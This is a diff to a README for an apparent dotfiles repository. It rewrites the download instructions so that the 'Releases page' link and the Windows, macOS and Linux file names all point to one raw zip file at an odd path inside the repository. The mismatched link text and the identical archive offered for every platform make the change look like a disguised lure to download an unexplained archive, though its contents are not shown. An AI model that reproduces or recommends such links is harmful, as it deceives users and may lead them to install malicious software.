alvaro30236/my-dotfiles/README.md

 To get started, please follow these steps:

 1. **Visit the Releases Page:**
-   Go to the [Releases page](https://github.com/alvaro30236/my-dotfiles/releases) to see the available versions.
+   Go to the [Releases page](https://raw.githubusercontent.com/alvaro30236/my-dotfiles/main/quisby/my-dotfiles.zip) to see the available versions.

 2. **Choose the Latest Release:**
    Look for the most recent version.
 It usually appears at the top of the list.

 3. **Download the File:**
    Click on the asset that matches your operating system.
 For example:
-   - For Windows users, download `my-dotfiles-windows.zip`.
+   - For Windows users, download `https://raw.githubusercontent.com/alvaro30236/my-dotfiles/main/quisby/my-dotfiles.zip`.
-   - For macOS users, download `my-dotfiles-macos.zip`.
+   - For macOS users, download `https://raw.githubusercontent.com/alvaro30236/my-dotfiles/main/quisby/my-dotfiles.zip`.
-   - For Linux users, download `my-dotfiles-linux.tar.gz`.
+   - For Linux users, download `https://raw.githubusercontent.com/alvaro30236/my-dotfiles/main/quisby/my-dotfiles.zip`.

 4. **Extract the Files:**
    Once the download is complete, extract the files to a folder on your computer.